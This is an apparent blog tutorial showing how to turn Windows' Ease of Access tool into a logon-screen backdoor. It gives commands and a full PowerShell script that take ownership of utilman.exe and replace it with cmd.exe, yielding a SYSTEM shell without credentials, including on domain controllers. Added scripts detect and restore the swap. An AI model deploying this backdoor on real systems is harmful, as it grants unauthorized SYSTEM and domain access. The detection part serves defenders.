On every Windows system there is a small but useful feature called Ease of Access. If you want a high-contrast theme, an optimized visual display or closed captions, then Ease of Access is your friend. You can start it without logging in, straight from the logon screen. This article describes how to use utilman.exe to create a backdoor to your system. At the end of the article we will restore the default settings.
What's in this article?
If you want to configure your system to look like this, then continue reading … Pay attention to the background: I am not logged in, and I can still run cmd with administrative rights (the logon screen starts utilman.exe as the local SYSTEM account, so the shell runs as SYSTEM) … This works on Windows 10 and Windows Server …
The file that starts Ease of Access is called utilman.exe. You can find it in C:\Windows\System32. But now we come across a problem. We have to modify the file, and it is owned by TrustedInstaller; even the Administrators group only has read and execute permissions on it. So we have to take ownership and grant full access to our administrator account. Open Windows PowerShell with administrative rights. Pay attention to the grant parameter in the second command: the account named there receives Full control. $env:username resolves to the user you are logged on as; if necessary, replace it with the name of your user account (for a domain account, DOMAIN\user), which must be a member of the local Administrators group.
takeown /f $env:windir\system32\utilman.exe
icacls $env:windir\system32\utilman.exe /grant "$($env:username):F"
Now we rename it to utilman2.exe. Then we copy cmd.exe and call the copy utilman.exe 😉
Rename-Item $env:windir\system32\utilman.exe $env:windir\system32\utilman2.exe
Copy-Item $env:windir\system32\cmd.exe $env:windir\system32\utilman.exe
What has happened now? We have a new file called utilman.exe. But this file will not run Ease of Access. It will run cmd.
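The whole swap as one script, added here as an example (it is not from the original post): it does the same takeown, icacls, rename and copy as above, but first checks that the backup name is still free (Rename-Item fails if the target exists), and afterwards verifies by SHA-256 hash that the new utilman.exe really is a copy of cmd.exe. It assumes an elevated Windows PowerShell session and the backup name utilman2.exe used in this article.

```powershell
# Added example, not from the original post: swap utilman.exe for cmd.exe with checks.
# Assumes an elevated Windows PowerShell session; the backup name utilman2.exe follows the article.
#Requires -RunAsAdministrator
$sys32   = Join-Path $env:windir 'System32'
$utilman = Join-Path $sys32 'utilman.exe'
$backup  = Join-Path $sys32 'utilman2.exe'   # backup name used in the article
$cmd     = Join-Path $sys32 'cmd.exe'

# Rename-Item refuses to overwrite, so refuse to run twice and lose the original
if (Test-Path $backup) {
    throw "Backup $backup already exists; the swap was probably done before."
}

# utilman.exe is owned by TrustedInstaller: take ownership first, then grant ourselves Full control
takeown.exe /f $utilman | Out-Null
icacls.exe  $utilman /grant "$($env:USERNAME):F" | Out-Null

# Keep the original under the backup name and put a copy of cmd.exe in its place
Rename-Item -Path $utilman -NewName 'utilman2.exe'
Copy-Item   -Path $cmd -Destination $utilman

# Verify: the new utilman.exe must be byte-identical to cmd.exe
$newHash = (Get-FileHash -Path $utilman -Algorithm SHA256).Hash
$cmdHash = (Get-FileHash -Path $cmd     -Algorithm SHA256).Hash
if ($newHash -ne $cmdHash) {
    throw "utilman.exe was not replaced by cmd.exe (hash mismatch)"
}
"utilman.exe now launches cmd.exe; the original is saved as $backup"
```

Run it once from an elevated PowerShell; the guard at the top makes a second run fail instead of renaming the already-swapped cmd.exe copy over your backup.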
Testing the configuration
Now log off. Click on the icon in the lower right corner. This is Ease of Access.
But now it's cmd. You are able to configure your system without logging in.
If you do this on a Domain Controller, feel free to start PowerShell and run Get-ADUser. 😉 Note: an attacker who has done this on a Domain Controller can now administer your whole Active Directory domain from the logon screen, without any credentials.
Or open dsa.msc to administer Active Directory.
You should undo the changes you have made. Delete c:\windows\system32\utilman.exe (which currently opens cmd) first, then rename c:\windows\system32\utilman2.exe to utilman.exe to restore the default settings (the delete has to come first, because Rename-Item will not overwrite an existing file). The permissions you granted and the ownership you took stay on the restored file unless you revert them too. If the backup is gone, sfc /scannow restores the original utilman.exe from the component store.
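An added example (not from the original post) that first checks whether utilman.exe has been swapped and then restores it. The interesting part is the check: a copied cmd.exe is still a genuine, catalog-signed Microsoft binary, so Get-AuthenticodeSignature reports it as Valid and an "is it signed?" audit misses the backdoor. The embedded version information and a hash comparison against cmd.exe do catch it. The restore also reverts the ACL change from earlier: it removes the explicit Full-control entry and hands ownership back to TrustedInstaller. It assumes an elevated Windows PowerShell session and the backup name utilman2.exe from this article.

```powershell
# Added example, not from the original post: detect a swapped utilman.exe, then restore it.
# Assumes an elevated Windows PowerShell session; the backup name utilman2.exe follows the article.
#Requires -RunAsAdministrator
$sys32   = Join-Path $env:windir 'System32'
$utilman = Join-Path $sys32 'utilman.exe'
$backup  = Join-Path $sys32 'utilman2.exe'
$cmd     = Join-Path $sys32 'cmd.exe'

function Test-UtilmanSwapped {
    # A renamed copy of cmd.exe still validates through the Windows catalog, so the
    # signature status alone proves nothing. Compare version info and hashes instead.
    $info    = (Get-Item -Path $utilman).VersionInfo
    $hash    = (Get-FileHash -Path $utilman -Algorithm SHA256).Hash
    $cmdHash = (Get-FileHash -Path $cmd     -Algorithm SHA256).Hash
    [pscustomobject]@{
        OriginalFilename = $info.OriginalFilename   # the name the binary was built with; cmd.exe's own name after the swap
        FileDescription  = $info.FileDescription    # "Windows Command Processor" after the swap
        IsCmd            = ($hash -eq $cmdHash)     # true when utilman.exe is byte-identical to cmd.exe
        Signature        = (Get-AuthenticodeSignature -FilePath $utilman).Status   # Valid either way
    }
}

$state = Test-UtilmanSwapped
$state | Format-List

if ($state.IsCmd) {
    if (-not (Test-Path $backup)) {
        throw "No backup at $backup; run 'sfc /scannow' to restore utilman.exe from the component store."
    }
    # Delete first: Rename-Item will not overwrite an existing utilman.exe
    Remove-Item -Path $utilman -Force
    Rename-Item -Path $backup -NewName 'utilman.exe'

    # Revert the ACL change: drop our Full-control entry, give ownership back to TrustedInstaller
    icacls.exe $utilman /remove:g $env:USERNAME | Out-Null
    icacls.exe $utilman /setowner 'NT SERVICE\TrustedInstaller' | Out-Null
    "utilman.exe restored from $backup"
}
else {
    "utilman.exe is not a copy of cmd.exe; nothing to restore"
}
```

The same Test-UtilmanSwapped logic works as a periodic check on servers you care about: a utilman.exe whose OriginalFilename or hash matches another System32 binary is a swapped accessibility tool, whatever the signature status says.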
Is the possibility to rename utilman.exe and replace it with cmd.exe a security issue? The answer is not easy. utilman.exe is a protected file: you have to take ownership before you can touch it, and that already requires local administrator rights. On a running system the swap is therefore not a privilege escalation; it is persistence, an administrator turning the logon screen into a password-less SYSTEM shell. Keep in mind, though, that without full-disk encryption the same file swap can be made offline from boot media, with no credentials at all. What do you think?